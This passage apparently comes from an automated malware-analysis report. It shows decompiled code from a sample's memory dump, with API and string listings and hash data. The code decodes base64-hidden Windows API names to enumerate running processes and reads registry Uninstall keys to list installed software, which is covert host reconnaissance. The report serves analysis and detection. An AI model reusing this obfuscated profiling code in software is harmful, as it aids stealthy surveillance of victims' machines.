								_t43 = _t195 * 0x8b * 4; // 0x0
								_t242 = _t229 * 0x8b;
								_t235 = _v8;
								_t47 = _t242 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t229 = _t229 + 1;
								_t171 = _t171 - 1;
							} while (_t171 != 0);
						}
						_t170 = _t195 * 0x8b;
						_t52 = _t170 * 4; // 0x0
						_t56 = _t170 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
						}
						_t195 = _t195 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t141 = E00404648(_v8) - 1;
				if(_t141 >= 0) {
					_v28 = _t141 + 1;
					_t194 = 0;
					do {
						_t240 = _t194 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
							_t75 = _t240 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t240 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416680);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t240 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416674);
								_push(E00416680);
								E00403850();
							}
							_t96 = _t194 * 0x8b * 4; // 0x1ffff
							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t194 = _t194 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E004165CD);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t216 =  *0x4160c4; // 0x4160c8
				return E00404810( &_v8, _t216);
			}

0x00416290
0x00416291
0x00416293
0x0041629e
0x004162a4
0x004162aa
0x004162b0
0x004162b6
0x004162bc
0x004162c2
0x004162c8
0x004162cb
0x004162ce
0x004162dc
0x004162ea
0x004162f5
0x0041630b
0x00416318
0x00416323
0x00416339
0x00416346
0x00416351
0x00416362
0x0041637e
0x00416383
0x0041638e
0x00416393
0x00416399
0x004163a9
0x004163aa
0x004163af
0x004163b1
0x004163ba
0x004163c9
0x004163d4
0x004163ea
0x004163f5
0x004163f5
0x004163f5
0x004163f7
0x0041640b
0x00416418
0x00416419
0x0041641c
0x004163b1
0x00416421
0x00416428
0x00416428
0x00416432
0x00416435
0x00416438
0x0041643b
0x0041643d
0x0041643d
0x00416449
0x0041644c
0x0041644e
0x0041644f
0x00416451
0x0041645a
0x0041645e
0x00416464
0x00416467
0x0041646b
0x0041646d
0x0041646d
0x00416471
0x00416472
0x00416472
0x00416451
0x00416475
0x0041647e
0x00416485
0x00416489
0x0041648b
0x0041648b
0x00416493
0x00416498
0x00416498
0x004164a0
0x004164a1
0x004164a1
0x004164a1
0x0041643d
0x004164ab
0x004164b6
0x004164b9
0x004164c0
0x004164c3
0x004164c5
0x004164c5
0x004164d3
0x004164dc
0x004164e3
0x0041651e
0x0041652a
0x00416533
0x00416538
0x0041653e
0x0041654b
0x004164e5
0x004164e5
0x004164f1
0x004164fa
0x004164ff
0x00416505
0x0041650a
0x00416517
0x00416517
0x0041655a
0x00416569
0x00416578
0x00416578
0x00416583
0x00416588
0x00416589
0x00416589
0x00416589
0x004164c5
0x00416594
0x00416597
0x0041659a
0x004165aa
0x004165b2
0x004165ba
0x004165c5

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
Instruction ID: 2c13e8732db89e5f4feef8cb650b0c3b12524099063521553718e4477c38e71b
Opcode Fuzzy Hash: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
Instruction Fuzzy Hash: 779185709001199BCB10EFA9C985ADEB7B9FF84304F2181BAE509B7291D739DF858F58

Uniqueness

Uniqueness Score: -1.00%

Function 00416288, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00416288(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				signed int _t110;
				CHAR* _t115;
				CHAR* _t121;
				CHAR* _t127;
				void* _t139;
				void* _t143;
				void* _t171;
				signed int _t172;
				void* _t173;
				intOrPtr* _t176;
				signed int _t185;
				intOrPtr* _t194;
				void* _t195;
				signed int _t196;
				signed int _t197;
				intOrPtr _t216;
				intOrPtr _t218;
				signed int _t231;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;

				_t240 = __esi;
				_t109 = __eax +  *__eax;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 | 0x5500000a;
				_t247 = _t248;
				_t249 = _t248 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t110;
				 *[fs:eax] = _t249;
				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t115 = E00403990(_v588);
				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
				E004069A8("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
				_t121 = E00403990(_v592);
				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
				E004069A8("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
				_t127 = E00403990(_v596);
				E004069A8("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
				E004034E4(_v16);
				_t195 =  *_t194(2, 0,  *[fs:eax], 0x4165c6, _t248, __edi, __esi, __ebx, _t246);
				if(_t195 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t195);
					if( *_t237() != 0) {
						do {
							_push(E00404648(_v8) + 1);
							E00404804();
							_t185 = E00404648(_v8);
							_t245 =  &_v584;
							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
							_t249 = _t249 + 0x10;
							_t237 = _t245 + 0x116;
							_t241 = _t241;
							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t195);
						} while ( *_t241() != 0);
					}
					_t176 =  *0x41b1b4; // 0x41c690
					 *((intOrPtr*)( *_t176))(_t195);
				}
				_t139 = E00404648(_v8) - 1;
				if(_t139 >= 0) {
					_v28 = _t139 + 1;
					_t197 = 0;
					do {
						_v17 = 1;
						_t171 = E00404648(_v8) - 1;
						if(_t171 >= 0) {
							_t173 = _t171 + 1;
							_t231 = 0;
							do {
								_t43 = _t197 * 0x8b * 4; // 0x0
								_t244 = _t231 * 0x8b;
								_t237 = _v8;
								_t47 = _t244 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t231 = _t231 + 1;
								_t173 = _t173 - 1;
							} while (_t173 != 0);
						}
						_t172 = _t197 * 0x8b;
						_t52 = _t172 * 4; // 0x0
						_t56 = _t172 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
						}
						_t197 = _t197 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t143 = E00404648(_v8) - 1;
				if(_t143 >= 0) {
					_v28 = _t143 + 1;
					_t196 = 0;
					do {
						_t242 = _t196 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
							_t75 = _t242 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t242 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416680);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t242 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416674);
								_push(E00416680);
								E00403850();
							}
							_t96 = _t196 * 0x8b * 4; // 0x1ffff
							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t196 = _t196 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t216);
				 *[fs:eax] = _t216;
				_push(E004165CD);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t218 =  *0x4160c4; // 0x4160c8
				return E00404810( &_v8, _t218);
			}

0x00416288
0x00416288
0x0041628a
0x0041628c
0x00416291
0x00416293
0x0041629e
0x004162a4
0x004162aa
0x004162b0
0x004162b6
0x004162bc
0x004162c2
0x004162c8
0x004162cb
0x004162ce
0x004162dc
0x004162ea
0x004162f5
0x0041630b
0x00416318
0x00416323
0x00416339
0x00416346
0x00416351
0x00416362
0x0041637e
0x00416383
0x0041638e
0x00416393
0x00416399
0x004163a9
0x004163aa
0x004163af
0x004163b1
0x004163ba
0x004163c9
0x004163d4
0x004163ea
0x004163f5
0x004163f5
0x004163f5
0x004163f7
0x0041640b
0x00416418
0x00416419
0x0041641c
0x004163b1
0x00416421
0x00416428
0x00416428
0x00416432
0x00416435
0x00416438
0x0041643b
0x0041643d
0x0041643d
0x00416449
0x0041644c
0x0041644e
0x0041644f
0x00416451
0x0041645a
0x0041645e
0x00416464
0x00416467
0x0041646b
0x0041646d
0x0041646d
0x00416471
0x00416472
0x00416472
0x00416451
0x00416475
0x0041647e
0x00416485
0x00416489
0x0041648b
0x0041648b
0x00416493
0x00416498
0x00416498
0x004164a0
0x004164a1
0x004164a1
0x004164a1
0x0041643d
0x004164ab
0x004164b6
0x004164b9
0x004164c0
0x004164c3
0x004164c5
0x004164c5
0x004164d3
0x004164dc
0x004164e3
0x0041651e
0x0041652a
0x00416533
0x00416538
0x0041653e
0x0041654b
0x004164e5
0x004164e5
0x004164f1
0x004164fa
0x004164ff
0x00416505
0x0041650a
0x00416517
0x00416517
0x0041655a
0x00416569
0x00416578
0x00416578
0x00416583
0x00416588
0x00416589
0x00416589
0x00416589
0x004164c5
0x00416594
0x00416597
0x0041659a
0x004165aa
0x004165b2
0x004165ba
0x004165c5

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
Instruction ID: 8191d344cd349c88f577da4185e159338671ce922f6aa283bd2b5e25c2800bc5
Opcode Fuzzy Hash: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
Instruction Fuzzy Hash: E091A5709001199BCB10EFA9C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041628C, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041628C(signed int __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				void* _t138;
				void* _t142;
				void* _t170;
				signed int _t171;
				void* _t172;
				intOrPtr* _t175;
				signed int _t184;
				intOrPtr* _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t215;
				intOrPtr _t217;
				signed int _t230;
				intOrPtr* _t240;
				signed int _t241;
				signed int _t243;
				void* _t244;
				void* _t245;
				void* _t247;
				intOrPtr _t248;

				_t239 = __esi;
				_t109 = __eax | 0x5500000a;
				_t246 = _t247;
				_t248 = _t247 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t109;
				 *[fs:eax] = _t248;
				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t114 = E00403990(_v588);
				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
				E004069A8("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
				_t120 = E00403990(_v592);
				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
				E004069A8("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
				_t126 = E00403990(_v596);
				E004069A8("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
				E004034E4(_v16);
				_t194 =  *_t193(2, 0,  *[fs:eax], 0x4165c6, _t247, __edi, __esi, __ebx, _t245);
				if(_t194 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t194);
					if( *_t236() != 0) {
						do {
							_push(E00404648(_v8) + 1);
							E00404804();
							_t184 = E00404648(_v8);
							_t244 =  &_v584;
							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
							_t248 = _t248 + 0x10;
							_t236 = _t244 + 0x116;
							_t240 = _t240;
							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t194);
						} while ( *_t240() != 0);
					}
					_t175 =  *0x41b1b4; // 0x41c690
					 *((intOrPtr*)( *_t175))(_t194);
				}
				_t138 = E00404648(_v8) - 1;
				if(_t138 >= 0) {
					_v28 = _t138 + 1;
					_t196 = 0;
					do {
						_v17 = 1;
						_t170 = E00404648(_v8) - 1;
						if(_t170 >= 0) {
							_t172 = _t170 + 1;
							_t230 = 0;
							do {
								_t43 = _t196 * 0x8b * 4; // 0x0
								_t243 = _t230 * 0x8b;
								_t236 = _v8;
								_t47 = _t243 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t230 = _t230 + 1;
								_t172 = _t172 - 1;
							} while (_t172 != 0);
						}
						_t171 = _t196 * 0x8b;
						_t52 = _t171 * 4; // 0x0
						_t56 = _t171 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
						}
						_t196 = _t196 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t142 = E00404648(_v8) - 1;
				if(_t142 >= 0) {
					_v28 = _t142 + 1;
					_t195 = 0;
					do {
						_t241 = _t195 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
							_t75 = _t241 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t241 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416680);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t241 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416674);
								_push(E00416680);
								E00403850();
							}
							_t96 = _t195 * 0x8b * 4; // 0x1ffff
							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t195 = _t195 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E004165CD);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t217 =  *0x4160c4; // 0x4160c8
				return E00404810( &_v8, _t217);
			}

0x0041628c
0x0041628c
0x00416291
0x00416293
0x0041629e
0x004162a4
0x004162aa
0x004162b0
0x004162b6
0x004162bc
0x004162c2
0x004162c8
0x004162cb
0x004162ce
0x004162dc
0x004162ea
0x004162f5
0x0041630b
0x00416318
0x00416323
0x00416339
0x00416346
0x00416351
0x00416362
0x0041637e
0x00416383
0x0041638e
0x00416393
0x00416399
0x004163a9
0x004163aa
0x004163af
0x004163b1
0x004163ba
0x004163c9
0x004163d4
0x004163ea
0x004163f5
0x004163f5
0x004163f5
0x004163f7
0x0041640b
0x00416418
0x00416419
0x0041641c
0x004163b1
0x00416421
0x00416428
0x00416428
0x00416432
0x00416435
0x00416438
0x0041643b
0x0041643d
0x0041643d
0x00416449
0x0041644c
0x0041644e
0x0041644f
0x00416451
0x0041645a
0x0041645e
0x00416464
0x00416467
0x0041646b
0x0041646d
0x0041646d
0x00416471
0x00416472
0x00416472
0x00416451
0x00416475
0x0041647e
0x00416485
0x00416489
0x0041648b
0x0041648b
0x00416493
0x00416498
0x00416498
0x004164a0
0x004164a1
0x004164a1
0x004164a1
0x0041643d
0x004164ab
0x004164b6
0x004164b9
0x004164c0
0x004164c3
0x004164c5
0x004164c5
0x004164d3
0x004164dc
0x004164e3
0x0041651e
0x0041652a
0x00416533
0x00416538
0x0041653e
0x0041654b
0x004164e5
0x004164e5
0x004164f1
0x004164fa
0x004164ff
0x00416505
0x0041650a
0x00416517
0x00416517
0x0041655a
0x00416569
0x00416578
0x00416578
0x00416583
0x00416588
0x00416589
0x00416589
0x00416589
0x004164c5
0x00416594
0x00416597
0x0041659a
0x004165aa
0x004165b2
0x004165ba
0x004165c5

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6

Strings

Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 004162E5
UHJvY2VzczMyTmV4dFc=, xrefs: 00416341
UHJvY2VzczMyRmlyc3RX, xrefs: 00416313
a2VybmVsMzIuZGxs, xrefs: 0041635D
kernel32.dll, xrefs: 004162FB, 00416329

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
Instruction ID: 948cc98421d4847538e10b66e82c05f92fa6bf3d8733b6e628a134da397cb227
Opcode Fuzzy Hash: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
Instruction Fuzzy Hash: 8281A6709001199BCB10EF99C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041564C, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041564C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v1009;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				void* _t123;
				void* _t144;
				void* _t178;
				void* _t199;
				intOrPtr* _t262;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;
				intOrPtr _t318;
				char* _t329;
				int _t331;
				int _t332;
				intOrPtr _t334;
				intOrPtr _t335;

				_t334 = _t335;
				_t263 = 0x8f;
				do {
					_push(0);
					_push(0);
					_t263 = _t263 - 1;
				} while (_t263 != 0);
				_t262 = __eax;
				_t329 =  &_v1009;
				_push(_t334);
				_push(0x415b6e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t335;
				E004034E4(__eax);
				_t331 = 0;
				E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
					E00403D88( &_v1024,  *_t262);
					_push(_v1024);
					_push(0);
					_push( &_v1028);
					E004069A8("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
					E00403CF4( &_v1032, E00403990(_v1036));
					_push(_v1032);
					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
					_push( &_v1044);
					E00403748( &_v1048, 0x3e9, _t329);
					_pop(_t123);
					E00403798(_t123, _v1048);
					E00403CF4( &_v1040, E00403990(_v1044));
					_pop(_t265);
					E004075C0(0x80000002, _t262, _t265, _v1040);
					_push(_v1028);
					_push(0x415c44);
					_push(0);
					_push( &_v1052);
					E004069A8("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
					E00403CF4( &_v1056, E00403990(_v1060));
					_push(_v1056);
					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
					_push( &_v1068);
					E00403748( &_v1072, 0x3e9, _t329);
					_pop(_t144);
					E00403798(_t144, _v1072);
					E00403CF4( &_v1064, E00403990(_v1068));
					_pop(_t267);
					E004075C0(0x80000002, _t262, _t267, _v1064);
					_push(_v1052);
					_push(")");
					E00403E78();
					E0040377C(_t262, _v1020);
					_t331 = _t331 + 1;
				}
				_t332 = 0;
				E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
					E00403D88( &_v1084,  *_t262);
					_push(_v1084);
					_push(0);
					_push( &_v1088);
					E004069A8("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
					E00403CF4( &_v1092, E00403990(_v1096));
					_push(_v1092);
					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
					_push( &_v1104);
					E00403748( &_v1108, 0x3e9, _t329);
					_pop(_t178);
					E00403798(_t178, _v1108);
					E00403CF4( &_v1100, E00403990(_v1104));
					_pop(_t269);
					E004075C0(0x80000001, _t262, _t269, _v1100);
					_push(_v1088);
					_push(0x415c44);
					_push(0);
					_push( &_v1112);
					E004069A8("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
					E00403CF4( &_v1116, E00403990(_v1120));
					_push(_v1116);
					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
					_push( &_v1128);
					E00403748( &_v1132, 0x3e9, _t329);
					_pop(_t199);
					E00403798(_t199, _v1132);
					E00403CF4( &_v1124, E00403990(_v1128));
					_pop(_t271);
					E004075C0(0x80000001, _t262, _t271, _v1124);
					_push(_v1112);
					_push(")");
					E00403E78();
					E0040377C(_t262, _v1080);
					_t332 = _t332 + 1;
				}
				E00403D88( &_v1140,  *_t262);
				E0040717C(_v1140, _t262, 0x415c78, L"()\r\n",  &_v1136);
				E0040377C(_t262, _v1136);
				E00403D88( &_v1148,  *_t262);
				E0040717C(_v1148, _t262, 0x415c78, L"\r\n\r\n",  &_v1144);
				E0040377C(_t262, _v1144);
				_pop(_t318);
				 *[fs:eax] = _t318;
				_push(E00415B78);
				E00403BF4( &_v1148, 4);
				E00403508( &_v1132, 2);
				E00403BDC( &_v1124);
				E004034E4( &_v1120);
